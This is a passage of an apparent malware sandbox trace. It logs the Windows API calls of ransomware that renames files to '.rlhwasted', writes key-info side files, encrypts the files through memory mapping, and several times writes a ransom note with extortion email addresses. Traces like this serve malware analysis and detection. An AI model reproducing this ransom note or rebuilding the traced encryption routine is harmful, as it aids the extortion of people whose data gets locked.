phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0199.562] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.562] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.562] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0199.562] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.562] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0199.570] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.570] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fLw5nWpmX1wDdo5AO3P4t4QNHdPfyRhVT5abLR8uoW1ZRTBKlwdfGIZiQHMItieE\r\nHh+C9+GeBQ022hysPSpLhqa+ZDgPpJ0mhdBWnMSIBOk5KreowZ4QjlgzaHR7rmWI\r\ni+vLWqLR7G06xpisd9+KxTkfu+rYNfAy/MFL/5j808aG5CM3xdIoce2HvZqHYddu\r\negouMgJYoWfZQINw/KxUrv1jcLG7qmtDcddv8pPamcAZ7kqFIdaDGDs88Do9yuZ4\r\n7JkDDU2i7Ef8BbJF0qTKPo3YL09THu6CNgwkxoOToYCOClmbYF0TxcEwg+HjBxN0\r\n7iH2dwZmzufJ1wbITnuA8XG6mNeBnbJJeC8Ik6BtOQNuhTKi7AMD1/ALJtTf0+BQ\r\nEBQNLb47ty2zCFNqagrwtV52g62nwZX89cxwns7F+zLhePLhvNWLrYskin2XNOa2\r\nl9F9OYqkb3eGjwgYwpKPSMAY4BjwOllKmUhPxqzGUXgGmser4x4ySUcmu/q7xOWL\r\nLaYWO8zDxZ+xlbvl9K7U1OHOPpn7O2EJiHyQ/B/Bw+nDCgDJH06lZZz2XMSguhdf\r\ncFaDvhzWb7ljtkkKwMmYPhvhXVEriJi0Xj+bwowDY0vlFSWWJ3XuUuDyCKeC6LdV\r\neJg6EsgZwCmQ6yY1d8A/7EEEaSJad6I+fUtRK+4aeBY=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.570] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0199.571] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.571] SetEndOfFile (hFile=0x108) returned 1 [0199.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.573] CloseHandle (hObject=0x108) returned 1 [0199.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcc98 | out: hHeap=0x6b0000) returned 1 [0199.573] _aulldvrm () returned 0x0 [0199.573] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0199.574] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.574] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.574] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0199.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ec) returned 0x6d5420 [0199.575] lstrcpyW (in: lpString1=0x6d5502, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.575] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0199.576] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.576] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.577] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.578] SetEndOfFile (hFile=0x108) returned 1 [0199.578] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.578] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.578] lstrcpyW (in: lpString1=0x6d5502, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted")) returned 1 [0199.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0199.579] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.580] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x80000 [0199.580] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1360000 [0199.580] CloseHandle (hObject=0x124) returned 1 [0199.710] UnmapViewOfFile (lpBaseAddress=0x1360000) returned 1 [0199.717] CloseHandle (hObject=0x10c) returned 1 [0199.717] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.717] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0199.718] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.718] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.718] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0199.719] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.719] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.755] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5718 [0199.755] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.755] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.755] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VSPDuXC86UUuD4ml7GmDVPskyTcDsLhC5y++8IT3M7j1pFZlYvPGXM+49+5xWTSD\r\n7QJ15KqNth+rOGHFHpMVSW+z9SM7jtUOSfqZOd09g4zpM106B8DcTLg9phzm1mYv\r\nyopYI6gnNi5zNMQJQsPmX9A0hNq+ZNF3yHNmIDLX92lxD4TpbeN37K1GVQ5NQUlk\r\nwUKw444u+vuoeKB6Ty78j5xdM3Isk3jwceVDOH9MI2HjIHS8daB6Tznljj2DL2vf\r\nnI05VDJyTDy3jDB5/XL2hT373W9rNOfZtoFBr2v73GAMt9AjibvC7YJwH90+vCXa\r\nnXTK4vKYws2jS9FWcgd3DxRSkCrH0kCHoyZBdcpDH+uzZ4MNMvlLClAjd+hgRLs0\r\nb3KhEfKFHXOosTVoIIUTHwbg+9Kcra5lZf4VHLpASvdBfBl22ajdneF7NwFQnRj9\r\nWnFIEd0TN9j1uLDDiGXjdXLKA0OKAFji6HvOIyDjlL5VZM3yH8T/S8sG+1ZFQCU8\r\nkIHoBvWULAKvXgbAUBMTRddxG7SIycoX8Bhjn76Qn56ED/D/breGyQlp6aQLKmLW\r\nglzaMR6gFxoY37cEB90DloyECnKsizCETNeC7LOHyOEcdOFJMcavg1Wud77v6H5T\r\nw6Q0CX2ZcVeKF+N7TwI9MOpuS/9j7sYHZjvjE0so/i8=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.755] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5718 | out: hHeap=0x6b0000) returned 1 [0199.755] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.755] SetEndOfFile (hFile=0x108) returned 1 [0199.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.758] CloseHandle (hObject=0x108) returned 1 [0199.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0199.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ebb30 | out: hHeap=0x6b0000) returned 1 [0199.758] _aulldvrm () returned 0x0 [0199.758] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0199.759] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.760] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.760] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0199.760] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x6d5420 [0199.760] lstrcpyW (in: lpString1=0x6d54a8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.760] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.760] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0199.761] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.761] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.rlhwasted_info" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.762] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.763] SetEndOfFile (hFile=0x108) returned 1 [0199.763] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.764] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.764] lstrcpyW (in: lpString1=0x6d54a8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.rlhwasted")) returned 1 [0199.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0199.765] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.765] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x3ec5d2 [0199.765] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ec5d2) returned 0x12b0000 [0199.766] CloseHandle (hObject=0x124) returned 1 [0200.147] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0200.205] CloseHandle (hObject=0x10c) returned 1 [0200.212] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0200.215] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0200.223] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0200.223] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.223] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0200.224] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0200.224] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56c0 [0200.234] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.234] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Ka8TGTzhNT1QFBl2DZ1qvYKA/qUWpl0VOT5dyDML2J8HSk5Sk7KstzNvRjsxaSyW\r\nLLFLwkD5k6l7JDxfmXWoI/omFCpcikH2KuEpvyRCN3cGciX/w89y2U6CYXI2+nX3\r\nc9DJlU72aSy0gFJ3XGHz81Ds0yZALFJW3ThQLAfqsZZfjQyyy94l6DZFzs3wv3NV\r\nFoaWtPHxkvumP01NuVANEdIyLJTd/W/rZx/12qcRxmQe2CNkQZN1T8mm9Z6uFndZ\r\n0i/bGHFusQVHmTcL8nYVEtkWcbex5yTJ2597Re2Ya4/nVNvPcArLZt3eemh5fxEm\r\nsxUH7pCHXxAFZeNLN0uWbRL0oIzbhm4S46vprogUD9pc+Xdw22ozHSVwU1EdUZmy\r\nLsTeAGPwg6wIXfC194iAuq2FMG8ShG9Qm0z5LH8ZOvAYM/dWfqb/GlQirzwa6ugK\r\nZiwSYwbNWfvvItSRa94zOOeM77Qw693/8VQeVtXst9Kz4sIYfQg4ibbTndK24/1E\r\nGst8h+FIdkR5vAU+yXQEjUqv93Os6WONajI5h9TQmpZOPtk+TxNJ2HbDh2nNJ307\r\nXsXyugn1+R7ddcHH/Mum9A7A5YV8+0TbA/aM2rDFnv0vr6AJqez1hDw4V0curXy0\r\nfhBbPJRnPnugEKyGqDppWxBFfWUqDO8qP82R/gmHOrq=[end_key]\r\nKEEP IT\r\n") returned 981 [0200.234] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56c0 | out: hHeap=0x6b0000) returned 1 [0200.234] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0200.234] SetEndOfFile (hFile=0x108) returned 1 [0200.240] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.240] CloseHandle (hObject=0x108) returned 1 [0200.240] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0200.240] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b8f8 | out: hHeap=0x6b0000) returned 1 [0200.240] _aulldvrm () returned 0x0 [0200.240] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0200.241] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0200.241] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.241] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0200.241] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x274) returned 0x6d5420 [0200.242] lstrcpyW (in: lpString1=0x6d548a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0200.242] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.242] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0200.243] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0200.243] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.rlhwasted_info" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0200.243] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0200.244] SetEndOfFile (hFile=0x108) returned 1 [0200.248] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.248] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.248] lstrcpyW (in: lpString1=0x6d548a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0200.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.rlhwasted")) returned 1 [0200.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0200.249] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0200.249] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x49e459 [0200.249] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49e459) returned 0x1eb0000 [0200.250] CloseHandle (hObject=0x10c) returned 1 [0200.706] UnmapViewOfFile (lpBaseAddress=0x1eb0000) returned 1 [0200.787] CloseHandle (hObject=0x124) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0200.787] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdff0) returned 1 [0200.788] CryptGenRandom (in: hProv=0x6fdff0, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0200.789] CryptReleaseContext (hProv=0x6fdff0, dwFlags=0x0) returned 1 [0200.789] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdff0) returned 1 [0200.790] CryptGenRandom (in: hProv=0x6fdff0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0200.790] CryptReleaseContext (hProv=0x6fdff0, dwFlags=0x0) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0200.800] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.800] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 